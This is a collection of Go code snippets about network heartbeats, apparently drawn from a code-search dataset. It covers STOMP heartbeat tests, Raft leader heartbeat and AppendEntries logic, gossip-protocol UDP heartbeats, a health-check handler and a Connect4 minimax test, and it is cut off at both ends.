TestHB11SendReceiveApolloRev(t *testing.T) {\n\tif os.Getenv(\"STOMP_TEST11\") == \"\" {\n\t\tfmt.Println(\"TestHB11SendReceiveApolloRev norun\")\n\t\treturn\n\t}\n\tif os.Getenv(\"STOMP_HB11LONG\") == \"\" {\n\t\tfmt.Println(\"TestHB11SendReceiveApolloRev norun LONG\")\n\t\treturn\n\t}\n\t//\n\tn, _ := openConn(t)\n\tconn_headers := check11(TEST_HEADERS)\n\tconn_headers = conn_headers.Add(\"heart-beat\", \"10,10000\")\n\tc, e := Connect(n, conn_headers)\n\t// Error checks\n\tif e != nil {\n\t\tt.Errorf(\"Heartbeat send-receive connect error, unexpected: %q\", e)\n\t}\n\tif c.hbd == nil {\n\t\tt.Errorf(\"Heartbeat send-receive error expected hbd value.\")\n\t}\n\t//\n\tl := log.New(os.Stdout, \"\", log.Ldate|log.Lmicroseconds)\n\tc.SetLogger(l)\n\t//\n\tfmt.Println(\"TestHB11SendReceiveApolloRev start sleep\")\n\ttime.Sleep(1e9 * 120) // 120 secs\n\tfmt.Println(\"TestHB11SendReceiveApolloRev end sleep\")\n\tc.SetLogger(nil)\n\tif c.Hbrf {\n\t\tt.Errorf(\"Error, dirty heart beat read detected\")\n\t}\n\t//\n\t_ = c.Disconnect(empty_headers)\n\t_ = closeConn(t, n)\n}", "func SendBeat(){\n\tif r.IsLeader==1{\n\t\t\t\t//\tlogMutex.Lock()\n\t\t\t\t//\tlog_len := len(r.Log)-1\n\t\t\t\t//\tlogMutex.Unlock()\n\t\t\t\t\tmajorityCount:=1\n\t\t\t\t\tfor _,server:= range r.ClusterConfigV.Servers {\n\t\t\t\t\t\t//if i.Id !=raft.ServerId && i!=value && raft.matchIndex[i.Id] >majorityCheck {\n\t\t\t\t\tif server.Id !=r.Id && r.MatchIndex[server.Id] >= r.CommitIndex && r.MatchIndex[server.Id]!=0{\n\t\t\t\t\t\t\tmajorityCount++\n\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tif majorityCount>len(r.ClusterConfigV.Servers)/2 && majorityCount!=len(r.ClusterConfigV.Servers) && r.CommitIndex != -1 {\n\t\t\t\t\t\t//fmt.Println(\"Sync will be called \",r.CommitIndex)\n\t\t\t\t\t\tSyncAllLog(Log_Conn{r.Log[r.CommitIndex],nil})\n\t\t\t\t\t}else{\n\t\t\t\t\t\targs:=prepareHeartBeat()\n\t\t\t\t\t\tvar AppendAck_ch = make(chan int,len(r.ClusterConfigV.Servers)-1)\n\t\t\t\t\t\tfor _,server := range r.ClusterConfigV.Servers {\t\t\t \n\t\t\t\t\t\t\tif server.Id == r.Id { continue }\t\t\t\t\n\t \t\t\t\t\t\tgo r.sendAppendRpc(server,args,AppendAck_ch,false)\n\t\t\t\t\t\t} \n\t\t\t\t\t\theartBeatAck:=0\n\t\t\t\t\t\tfor j:=0;j<len(r.ClusterConfigV.Servers)-1;j++{\n\t\t\t\t\t\t\t<- AppendAck_ch \n\t\t\t\t\t\t\theartBeatAck = heartBeatAck+ 1\n\t\t\t\t\t\t\tif heartBeatAck > len(r.ClusterConfigV.Servers)/2 { \n\t\t\t\t\t\t\t\tbreak\t\t\t\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}//end of if\n\t\t\t\t\t\n}", "func TestHB11NoReceive(t *testing.T) {\n\tif os.Getenv(\"STOMP_TEST11\") == \"\" {\n\t\tfmt.Println(\"TestHB11NoReceive norun\")\n\t\treturn\n\t}\n\tif os.Getenv(\"STOMP_HB11LONG\") == \"\" {\n\t\tfmt.Println(\"TestHB11NoReceive norun LONG\")\n\t\treturn\n\t}\n\t//\n\tn, _ := openConn(t)\n\tconn_headers := check11(TEST_HEADERS)\n\tconn_headers = conn_headers.Add(\"heart-beat\", \"10000,0\") // No Receiving\n\tc, e := Connect(n, conn_headers)\n\t// Error checks\n\tif e != nil {\n\t\tt.Errorf(\"Heartbeat noreceive connect error, unexpected: %q\", e)\n\t}\n\tif c.hbd == nil {\n\t\tt.Errorf(\"Heartbeat noreceive error expected hbd value.\")\n\t}\n\t//\n\tl := log.New(os.Stdout, \"\", log.Ldate|log.Lmicroseconds)\n\tc.SetLogger(l)\n\t//\n\tfmt.Println(\"TestHB11NoReceive start sleep\")\n\ttime.Sleep(1e9 * 120) // 120 secs\n\tfmt.Println(\"TestHB11NoReceive end sleep\")\n\tc.SetLogger(nil)\n\t//\n\t_ = c.Disconnect(empty_headers)\n\t_ = closeConn(t, n)\n}", "func TestHeartbeatAnnounce(t *testing.T) {\n\tt.Parallel()\n\n\ttests := []struct {\n\t\tmode HeartbeatMode\n\t\tkind string\n\t}{\n\t\t{mode: HeartbeatModeProxy, kind: types.KindProxy},\n\t\t{mode: HeartbeatModeAuth, kind: types.KindAuthServer},\n\t}\n\tfor _, tt := range tests {\n\t\tt.Run(tt.mode.String(), func(t *testing.T) {\n\t\t\tctx, cancel := context.WithCancel(context.Background())\n\t\t\tdefer cancel()\n\t\t\tclock := clockwork.NewFakeClock()\n\n\t\t\tannouncer := newFakeAnnouncer(ctx)\n\t\t\thb, err := NewHeartbeat(HeartbeatConfig{\n\t\t\t\tContext: ctx,\n\t\t\t\tMode: tt.mode,\n\t\t\t\tComponent: \"test\",\n\t\t\t\tAnnouncer: announcer,\n\t\t\t\tCheckPeriod: time.Second,\n\t\t\t\tAnnouncePeriod: 60 * time.Second,\n\t\t\t\tKeepAlivePeriod: 10 * time.Second,\n\t\t\t\tServerTTL: 600 * time.Second,\n\t\t\t\tClock: clock,\n\t\t\t\tGetServerInfo: func() (types.Resource, error) {\n\t\t\t\t\tsrv := &types.ServerV2{\n\t\t\t\t\t\tKind: tt.kind,\n\t\t\t\t\t\tVersion: types.V2,\n\t\t\t\t\t\tMetadata: types.Metadata{\n\t\t\t\t\t\t\tNamespace: apidefaults.Namespace,\n\t\t\t\t\t\t\tName: \"1\",\n\t\t\t\t\t\t},\n\t\t\t\t\t\tSpec: types.ServerSpecV2{\n\t\t\t\t\t\t\tAddr: \"127.0.0.1:1234\",\n\t\t\t\t\t\t\tHostname: \"2\",\n\t\t\t\t\t\t},\n\t\t\t\t\t}\n\t\t\t\t\tsrv.SetExpiry(clock.Now().UTC().Add(apidefaults.ServerAnnounceTTL))\n\t\t\t\t\treturn srv, nil\n\t\t\t\t},\n\t\t\t})\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateInit)\n\n\t\t\t// on the first run, heartbeat will move to announce state,\n\t\t\t// will call announce right away\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounce)\n\n\t\t\terr = hb.announce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, announcer.upsertCalls[hb.Mode], 1)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounceWait)\n\t\t\trequire.Equal(t, hb.nextAnnounce, clock.Now().UTC().Add(hb.AnnouncePeriod))\n\n\t\t\t// next call will not move to announce, because time is not up yet\n\t\t\terr = hb.fetchAndAnnounce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounceWait)\n\n\t\t\t// advance time, and heartbeat will move to announce\n\t\t\tclock.Advance(hb.AnnouncePeriod + time.Second)\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounce)\n\t\t\terr = hb.announce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, announcer.upsertCalls[hb.Mode], 2)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounceWait)\n\t\t\trequire.Equal(t, hb.nextAnnounce, clock.Now().UTC().Add(hb.AnnouncePeriod))\n\n\t\t\t// in case of error, system will move to announce wait state,\n\t\t\t// with next attempt scheduled on the next keep alive period\n\t\t\tannouncer.err = trace.ConnectionProblem(nil, \"boom\")\n\t\t\tclock.Advance(hb.AnnouncePeriod + time.Second)\n\t\t\terr = hb.fetchAndAnnounce()\n\t\t\trequire.Error(t, err)\n\t\t\trequire.True(t, trace.IsConnectionProblem(err))\n\t\t\trequire.Equal(t, announcer.upsertCalls[hb.Mode], 3)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounceWait)\n\t\t\trequire.Equal(t, hb.nextAnnounce, clock.Now().UTC().Add(hb.KeepAlivePeriod))\n\n\t\t\t// once announce is successful, next announce is set on schedule\n\t\t\tannouncer.err = nil\n\t\t\tclock.Advance(hb.KeepAlivePeriod + time.Second)\n\t\t\terr = hb.fetchAndAnnounce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, announcer.upsertCalls[hb.Mode], 4)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounceWait)\n\t\t\trequire.Equal(t, hb.nextAnnounce, clock.Now().UTC().Add(hb.AnnouncePeriod))\n\t\t})\n\t}\n}", "func TestHB11Connect(t *testing.T) {\n\tif os.Getenv(\"STOMP_TEST11\") == \"\" {\n\t\tfmt.Println(\"TestHB11Connect norun\")\n\t\treturn\n\t}\n\t//\n\tn, _ := openConn(t)\n\tconn_headers := check11(TEST_HEADERS)\n\tconn_headers = conn_headers.Add(\"heart-beat\", \"100,10000\")\n\tc, e := Connect(n, conn_headers)\n\tif e != nil {\n\t\tt.Errorf(\"Heartbeat expected connection, got error: %q\\n\", e)\n\t}\n\tif c.hbd == nil {\n\t\tt.Errorf(\"Heartbeat expected data, got nil\")\n\t}\n\t//\n\t_ = c.Disconnect(empty_headers)\n\t_ = closeConn(t, n)\n}", "func (s *raftServer) sendHeartBeat() {\n\tae := &AppendEntry{Term: s.Term(), LeaderId: s.server.Pid()}\n\tae.LeaderCommit = s.commitIndex.Get()\n\te := &cluster.Envelope{Pid: cluster.BROADCAST, Msg: ae}\n\ts.server.Outbox() <- e\n}", "func heartBeat() {\n\tfor {\n\t\ttime.Sleep(time.Second * 5)\n\t\tif isSendHeartBeat {\n\t\t\tmp.Send(MP.NewMessage(nodeContext.ParentIP, nodeContext.ParentName, \"node_heartbeat\", MP.EncodeData(\"Hello, this is a heartbeat message.\")))\n\t\t}\n\t\t//fmt.Println(\"Node: send out heart beat message\")\n\t}\n}", "func (s *raftServer) sendHeartBeat() {\n\te := &cluster.Envelope{Pid: cluster.BROADCAST, Msg: &AppendEntry{Term: s.Term(), LeaderId: s.server.Pid()}}\n\ts.server.Outbox() <- e\n}", "func TestHeartbeatHealth(t *testing.T) {\n\tdefer leaktest.AfterTest(t)()\n\n\tstopper := stop.NewStopper()\n\tdefer stopper.Stop()\n\n\t// Can't be zero because that'd be an empty offset.\n\tclock := hlc.NewClock(time.Unix(0, 1).UnixNano)\n\n\tserverCtx := newNodeTestContext(clock, stopper)\n\ts, ln := newTestServer(t, serverCtx, true)\n\tremoteAddr := ln.Addr().String()\n\n\theartbeat := &ManualHeartbeatService{\n\t\tready: make(chan struct{}),\n\t\tstopper: stopper,\n\t\tclock: clock,\n\t\tremoteClockMonitor: serverCtx.RemoteClocks,\n\t}\n\tRegisterHeartbeatServer(s, heartbeat)\n\n\tclientCtx := newNodeTestContext(clock, stopper)\n\t// Make the intervals and timeouts shorter to speed up the tests.\n\tclientCtx.HeartbeatInterval = 1 * time.Millisecond\n\tclientCtx.HeartbeatTimeout = 1 * time.Millisecond\n\tif _, err := clientCtx.GRPCDial(remoteAddr); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// This code is inherently racy so when we need to verify heartbeats we want\n\t// them to always succeed.\n\tsendHeartbeats := func() func() {\n\t\tdone := make(chan struct{})\n\t\tgo func() {\n\t\t\tfor {\n\t\t\t\tselect {\n\t\t\t\tcase <-done:\n\t\t\t\t\treturn\n\t\t\t\tcase heartbeat.ready <- struct{}{}:\n\t\t\t\t}\n\t\t\t}\n\t\t}()\n\t\treturn func() {\n\t\t\tdone <- struct{}{}\n\t\t}\n\t}\n\n\t// Should be healthy after the first successful heartbeat.\n\tstopHeartbeats := sendHeartbeats()\n\tutil.SucceedsSoon(t, func() error {\n\t\tif !clientCtx.IsConnHealthy(remoteAddr) {\n\t\t\treturn errors.Errorf(\"expected %s to be healthy\", remoteAddr)\n\t\t}\n\t\treturn nil\n\t})\n\tstopHeartbeats()\n\n\t// Should no longer be healthy after heartbeating stops.\n\tutil.SucceedsSoon(t, func() error {\n\t\tif clientCtx.IsConnHealthy(remoteAddr) {\n\t\t\treturn errors.Errorf(\"expected %s to be unhealthy\", remoteAddr)\n\t\t}\n\t\treturn nil\n\t})\n\n\t// Should return to healthy after another successful heartbeat.\n\tstopHeartbeats = sendHeartbeats()\n\tutil.SucceedsSoon(t, func() error {\n\t\tif !clientCtx.IsConnHealthy(remoteAddr) {\n\t\t\treturn errors.Errorf(\"expected %s to be healthy\", remoteAddr)\n\t\t}\n\t\treturn nil\n\t})\n\tstopHeartbeats()\n\n\tif clientCtx.IsConnHealthy(\"non-existent connection\") {\n\t\tt.Errorf(\"non-existent connection is reported as healthy\")\n\t}\n}", "func (log *Logger) heartbeat() {\n\n\ttick := time.NewTicker(log.heartbeat_tick)\n\tfor range tick.C {\n\t\tif log.roll == nil {\n\t\t\tbreak\n\t\t}\n\t\tlog.INFO(\"alive\")\n\t}\n}", "func TestMockOnHeartbeat(t *testing.T) {\n\tmockServer := &MockRailsServer{T: t, Behaviour: MockHeartbeat}\n\n\tdialer := wstest.NewDialer(mockServer)\n\tdialer.HandshakeTimeout = time.Second * 2\n\n\tclient := NewClient(fakeEndpoint).WithDialer(dialer)\n\n\tcalled := make(chan struct{})\n\tcount := 0\n\n\tclient.OnHeartbeat(func(conn *websocket.Conn, payload *Payload) error {\n\t\tcount++\n\t\tif count >= 4 {\n\t\t\tcalled <- struct{}{}\n\t\t}\n\t\treturn nil\n\t})\n\terr := client.Serve()\n\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\treceiveSleepMs(2000, called, t)\n}", "func TestHB11ZeroHeader(t *testing.T) {\n\tn, _ := openConn(t)\n\tconn_headers := check11(TEST_HEADERS)\n\tc, _ := Connect(n, conn_headers.Add(\"heart-beat\", \"0,0\"))\n\tif c.protocol == SPL_10 {\n\t\t_ = closeConn(t, n)\n\t\treturn\n\t}\n\tif c.hbd != nil {\n\t\tt.Errorf(\"Expected no heartbeats for 1.1, zero header\")\n\t}\n\t_ = c.Disconnect(empty_headers)\n\t_ = closeConn(t, n)\n}", "func (rf *Raft) heartbeatAppendEntries() {\n\t// make server -> reply map\n\treplies := make([]*AppendEntriesReply, len(rf.peers))\n\tfor servIdx := range rf.peers {\n\t\treplies[servIdx] = &AppendEntriesReply{}\n\t}\n\n\tfor !rf.killed() {\n\t\trf.mu.Lock()\n\n\t\t// if we are no longer the leader\n\t\tif rf.state != Leader {\n\t\t\trf.Log(LogDebug, \"Discovered no longer the leader, stopping heartbeat\")\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t}\n\t\t// send out heartbeats concurrently if leader\n\t\tfor servIdx := range rf.peers {\n\t\t\tif servIdx != rf.me {\n\n\t\t\t\t// successful request - update matchindex and nextindex accordingly\n\t\t\t\tif replies[servIdx].Success {\n\t\t\t\t\tif replies[servIdx].HighestLogIndexAdded > 0 {\n\t\t\t\t\t\trf.matchIndex[servIdx] = replies[servIdx].HighestLogIndexAdded\n\t\t\t\t\t}\n\t\t\t\t\trf.nextIndex[servIdx] = rf.matchIndex[servIdx] + 1\n\n\t\t\t\t\t// failed request - check for better term or decrease nextIndex\n\t\t\t\t} else if !replies[servIdx].Success && replies[servIdx].Returned {\n\n\t\t\t\t\t// we might have found out we shouldn't be the leader!\n\t\t\t\t\tif replies[servIdx].CurrentTerm > rf.currentTerm {\n\t\t\t\t\t\trf.Log(LogDebug, \"Detected server with higher term, stopping heartbeat and changing to follower.\")\n\t\t\t\t\t\trf.state = Follower\n\t\t\t\t\t\trf.currentTerm = replies[servIdx].CurrentTerm\n\n\t\t\t\t\t\t// persist - updated current term\n\t\t\t\t\t\tdata := rf.GetStateBytes(false)\n\t\t\t\t\t\trf.persister.SaveRaftState(data)\n\n\t\t\t\t\t\tgo rf.heartbeatTimeoutCheck()\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\n\t\t\t\t\t// failure - we need to decrease next index\n\t\t\t\t\t// 1. case where follower has no entry at the place we thought\n\t\t\t\t\t// => want to back up to start of follower log\n\t\t\t\t\t// 2. case where server has entry with different term NOT seen by leader\n\t\t\t\t\t// => want to back up nextIndex to the start of the 'run' of entries with that term (i.e. IndexFirstConflictingTerm)\n\t\t\t\t\t// 3. case where server has entry with different term that HAS been seen by leader\n\t\t\t\t\t// => want to back up to last entry leader has with that term\n\t\t\t\t\t//\n\t\t\t\t\t// Note for 2 and 3 ... if leader does not have the relevant log\n\t\t\t\t\t// entries, we need to call InstallSnapshot!\n\t\t\t\t\t//\n\t\t\t\t\trf.Log(LogInfo, \"Failed to AppendEntries to server\", servIdx, \"\\n - IndexFirstConflictingTerm\", replies[servIdx].IndexFirstConflictingTerm, \"\\n - ConflictingEntryTerm\", replies[servIdx].ConflictingEntryTerm, \"\\n - LastLogIndex\", replies[servIdx].LastLogIndex)\n\t\t\t\t\tif replies[servIdx].ConflictingEntryTerm == -1 {\n\t\t\t\t\t\t// case 1 - follower has no entry at the given location\n\t\t\t\t\t\trf.nextIndex[servIdx] = replies[servIdx].LastLogIndex + 1\n\t\t\t\t\t} else {\n\t\t\t\t\t\t// if not case 1, need to check we have the logs at and beyond\n\t\t\t\t\t\t// IndexFirstConflictingTerm\n\t\t\t\t\t\traftLogIdx := rf.getTrimmedLogIndex(replies[servIdx].IndexFirstConflictingTerm)\n\t\t\t\t\t\tif raftLogIdx == -1 {\n\t\t\t\t\t\t\t// don't have the logs we need - will need to snapshot\n\t\t\t\t\t\t\t// set nextIndex to the lastIncludedIndex to force this\n\t\t\t\t\t\t\trf.nextIndex[servIdx] = rf.lastIncludedIndex\n\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\tif rf.log[raftLogIdx].Term != replies[servIdx].ConflictingEntryTerm {\n\t\t\t\t\t\t\t\t// case 2 - follower has a term not seen by leader\n\t\t\t\t\t\t\t\trf.Log(LogDebug, \"Case 2: follower has a term not seen by leader\")\n\t\t\t\t\t\t\t\trf.nextIndex[servIdx] = replies[servIdx].IndexFirstConflictingTerm\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t// case 3 - follower has a term seen by leader\n\t\t\t\t\t\t\t\t// need to go to latest entry that leader has with this term\n\t\t\t\t\t\t\t\trf.Log(LogDebug, \"Case 3: follower has a term seen by leader, finding leader's latest entry with this term \\n - rf.log[\", rf.log)\n\t\t\t\t\t\t\t\trf.nextIndex[servIdx] = replies[servIdx].IndexFirstConflictingTerm\n\t\t\t\t\t\t\t\tfor rf.log[rf.getTrimmedLogIndex(rf.nextIndex[servIdx])].Term == replies[servIdx].ConflictingEntryTerm {\n\t\t\t\t\t\t\t\t\trf.nextIndex[servIdx]++\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\t// if we need to install a snapshot, then\n\t\t\t\t// nextIndex becomes the next index after the snapshot we will install\n\t\t\t\t// notice that we will then immediately send an AppendEntries request to the server,\n\t\t\t\t// and it will fail until the snapshot is installed, and we will just keep\n\t\t\t\t// resetting nextIndex\n\t\t\t\tif rf.nextIndex[servIdx] <= rf.lastIncludedIndex {\n\t\t\t\t\trf.Log(LogInfo, \"Failed to AppendEntries to server\", servIdx, \"- need to send InstallSnapshot!\")\n\t\t\t\t\trf.nextIndex[servIdx] = rf.lastIncludedIndex + 1\n\n\t\t\t\t\t// actually call the RPC\n\t\t\t\t\targs := &InstallSnapshotArgs{\n\t\t\t\t\t\tLeaderTerm: rf.currentTerm,\n\t\t\t\t\t\tSnapshot: rf.persister.ReadSnapshot(),\n\t\t\t\t\t}\n\t\t\t\t\treply := &InstallSnapshotReply{}\n\t\t\t\t\tgo rf.sendInstallSnapshot(servIdx, args, reply)\n\t\t\t\t}\n\n\t\t\t\t// send a new append entries request to the server if the last one has finished\n\t\t\t\trf.Log(LogDebug, \"rf.nextIndex for server\", servIdx, \"set to idx\", rf.nextIndex[servIdx], \"\\n - rf.log\", rf.log, \"\\n - rf.lastIncludedIndex\", rf.lastIncludedIndex, \"\\n - rf.lastIncludedTerm\", rf.lastIncludedTerm)\n\t\t\t\tentries := []LogEntry{}\n\t\t\t\tif len(rf.log) > 0 {\n\t\t\t\t\tentries = rf.log[rf.getTrimmedLogIndex(rf.nextIndex[servIdx]):]\n\t\t\t\t}\n\t\t\t\targs := &AppendEntriesArgs{\n\t\t\t\t\tLeaderTerm: rf.currentTerm,\n\t\t\t\t\tLeaderCommitIndex: rf.commitIndex,\n\t\t\t\t\tLogEntries: entries,\n\t\t\t\t}\n\n\t\t\t\t// only place the reply into replies, when the RPC completes,\n\t\t\t\t// to prevent partial data (unsure if this can happen but seems like a good idea)\n\t\t\t\tgo func(servIdx int) {\n\t\t\t\t\trf.Log(LogDebug, \"sendAppendEntries to servIdx\", servIdx)\n\t\t\t\t\treply := &AppendEntriesReply{}\n\t\t\t\t\tok := rf.sendAppendEntries(servIdx, args, reply)\n\t\t\t\t\tif ok {\n\t\t\t\t\t\trf.Log(LogDebug, \"Received AppendEntries reply from server\", servIdx, \"\\n - reply\", reply)\n\t\t\t\t\t\treplies[servIdx] = reply\n\t\t\t\t\t}\n\t\t\t\t}(servIdx)\n\t\t\t}\n\t\t}\n\n\t\t// walk up through possible new commit indices\n\t\t// update commit index\n\t\torigIndex := rf.commitIndex\n\t\tnewIdx := rf.commitIndex + 1\n\t\tfor len(rf.log) > 0 && newIdx <= rf.log[len(rf.log)-1].Index {\n\t\t\treplicas := 1 // already replicated in our log\n\t\t\tfor servIdx := range rf.peers {\n\t\t\t\tif servIdx != rf.me && rf.matchIndex[servIdx] >= newIdx {\n\t\t\t\t\treplicas++\n\t\t\t\t}\n\t\t\t}\n\t\t\tif replicas >= int(math.Ceil(float64(len(rf.peers))/2.0)) &&\n\t\t\t\tnewIdx > rf.lastIncludedIndex &&\n\t\t\t\trf.getTrimmedLogIndex(newIdx) >= 0 &&\n\t\t\t\trf.log[rf.getTrimmedLogIndex(newIdx)].Term == rf.currentTerm {\n\t\t\t\trf.commitIndex = newIdx\n\t\t\t\trf.Log(LogInfo, \"Entry \", rf.log[rf.getTrimmedLogIndex(rf.commitIndex)], \"replicated on a majority of servers. Commited to index\", rf.commitIndex)\n\t\t\t}\n\t\t\tnewIdx++\n\t\t}\n\n\t\t// send messages to applyCh for every message that was committed\n\t\tfor origIndex < rf.commitIndex {\n\t\t\torigIndex++\n\t\t\tif rf.getTrimmedLogIndex(origIndex) >= 0 {\n\t\t\t\trf.Log(LogInfo, \"Sending applyCh confirmation for commit of \", rf.log[rf.getTrimmedLogIndex(origIndex)], \"at index\", origIndex)\n\t\t\t\t{\n\t\t\t\t\trf.applyCh <- ApplyMsg{\n\t\t\t\t\t\tCommandValid: true,\n\t\t\t\t\t\tCommandIndex: origIndex,\n\t\t\t\t\t\tCommandTerm: rf.currentTerm,\n\t\t\t\t\t\tCommand: rf.log[rf.getTrimmedLogIndex(origIndex)].Command,\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\trf.mu.Unlock()\n\t\ttime.Sleep(heartbeatSendInterval)\n\t}\n}", "func (c *HealthCheckController) HeartBeat(w http.ResponseWriter, r *http.Request) {\n\n\tbody := &viewmodels.ServiceResponse{\n\t\tCode: 1000,\n\t\tMessage: \"OK\",\n\t}\n\thelpers.APIResponse(w, 200, body)\n\treturn\n}", "func prepareHeartBeat() *AppendRPCArgs{\n\n\t\t\t\t\t\tlogEntry:=LogEntry{\n\t\t\t\t\t\t\t\tr.CurrentTerm,\n\t\t\t\t\t\t\t\tlen(r.Log),\n\t\t\t\t\t\t\t\tmake([] byte,0),\n\t\t\t\t\t\t\t\tfalse,\n\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tvar args *AppendRPCArgs\n\t\t\t\t\t\tif len(r.Log) >= 2 {\t\n\t\t\t\t\t\t\t\targs = &AppendRPCArgs {\n\t\t\t\t\t\t\t\t\t\tr.CurrentTerm,\n\t\t\t\t\t\t\t\t\t\tr.LeaderId,\n\t\t\t\t\t\t\t\t\t\tlen(r.Log)-1,\n\t\t\t\t\t\t\t\t\t\tr.Log[len(r.Log)-2].Term,\n\t\t\t\t\t\t\t\t\t\tlogEntry,\n\t\t\t\t\t\t\t\t\t\tr.CommitIndex,\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t} else if len(r.Log)==1 {\n\t\t\t\t\t\t\t\targs = &AppendRPCArgs {\n\t\t\t\t\t\t\t\t\t\tr.CurrentTerm,\n\t\t\t\t\t\t\t\t\t\tr.LeaderId,\n\t\t\t\t\t\t\t\t\t\t0,\n\t\t\t\t\t\t\t\t\t\tr.Log[len(r.Log)-1].Term,\n\t\t\t\t\t\t\t\t\t\tlogEntry,\n\t\t\t\t\t\t\t\t\t\tr.CommitIndex,\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\targs = &AppendRPCArgs {\n\t\t\t\t\t\t\t\t\t\tr.CurrentTerm,\n\t\t\t\t\t\t\t\t\t\tr.LeaderId,\n\t\t\t\t\t\t\t\t\t\t0,\n\t\t\t\t\t\t\t\t\t\tr.CurrentTerm,\n\t\t\t\t\t\t\t\t\t\tlogEntry,\n\t\t\t\t\t\t\t\t\t\tr.CommitIndex,\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t\treturn args\n}", "func TestFollowerCheckMsgApp(t *testing.T) {\n\tents := []pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}}\n\ttests := []struct {\n\t\tterm uint64\n\t\tindex uint64\n\t\twindex uint64\n\t\twreject bool\n\t\twrejectHint uint64\n\t}{\n\t\t// match with committed entries\n\t\t{0, 0, 1, false, 0},\n\t\t{ents[0].Term, ents[0].Index, 1, false, 0},\n\t\t// match with uncommitted entries\n\t\t{ents[1].Term, ents[1].Index, 2, false, 0},\n\n\t\t// unmatch with existing entry\n\t\t{ents[0].Term, ents[1].Index, ents[1].Index, true, 2},\n\t\t// unexisting entry\n\t\t{ents[1].Term + 1, ents[1].Index + 1, ents[1].Index + 1, true, 2},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append(ents)\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Commit: 1})\n\t\tr.becomeFollower(2, 2)\n\n\t\tr.Step(pb.Message{From: 2, FromGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tType: pb.MsgApp, Term: 2, LogTerm: tt.term, Index: tt.index})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\t\tType: pb.MsgAppResp, Term: 2, Index: tt.windex, Reject: tt.wreject, RejectHint: tt.wrejectHint},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = %+v, want %+v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func TestMMAB(t *testing.T) {\n\twins := 0\n\tfor i := 0; i < 1000; i++ {\n\t\tflip := true\n\t\tc4 := connect4.NewConnect4()\n\t\tfor !c4.GameOver() {\n\t\t\tif flip {\n\t\t\t\tc4.RandomMove(false)\n\t\t\t} else {\n\t\t\t\tc4.Move(MiniMax(&c4), false)\n\t\t\t}\n\t\t\tflip = !flip\n\n\t\t}\n\t\tif c4.Winner != nil && *c4.Winner == 2 {\n\t\t\twins++\n\t\t}\n\t}\n\tpercentage := ((float64)(wins) / (float64)(1000))\n\tif percentage < .9 {\n\t\tt.Errorf(\"Win percentage was too low\")\n\t}\n\tif percentage > 1 {\n\t\tt.Errorf(\"Win percentage was too high\")\n\t}\n}", "func sendHeartBeat(members map[string]Entry, selfName string) {\n\tm := createMessage(\"gossip\", members)\n\tb, err := json.Marshal(m)\n\tkMembers := pickAdresses(members, K, selfName)\n\tlogError(err)\n\tfor i := range kMembers {\n\t\trecipientId := kMembers[i]\n\n\t\t//split to timestamp and ip address\n\t\ta := strings.Split(recipientId, \"#\")\n\t\t//memberIp = ip\n\t\trecipientIp := a[1]\n\t\t//retrieve a UDPaddr\n\t\trecipientAddr, err := net.ResolveUDPAddr(\"udp\", recipientIp+\":\"+PORT)\n\t\tlogError(err)\n\t\tconn, err := net.DialUDP(\"udp\", nil, recipientAddr)\n\t\tif !logError(err) {\n\t\t\tconn.Write(b)\n\t\t\tconn.Close()\n\t\t}\n\t}\n}", "func listenHeartbeat(conn *net.UDPConn, nodePtr *nd.Node) (ms.MsList, string) {\n\tvar portLog string\n\tvar buf [5120]byte\n\n\tn, addr, err := conn.ReadFromUDP(buf[0:])\n\t//fmt.Print(\"n:\", n)\n\tif err != nil {\n\t\tfmt.Println(\"err != nil\")\n\t\treturn ms.MsList{}, 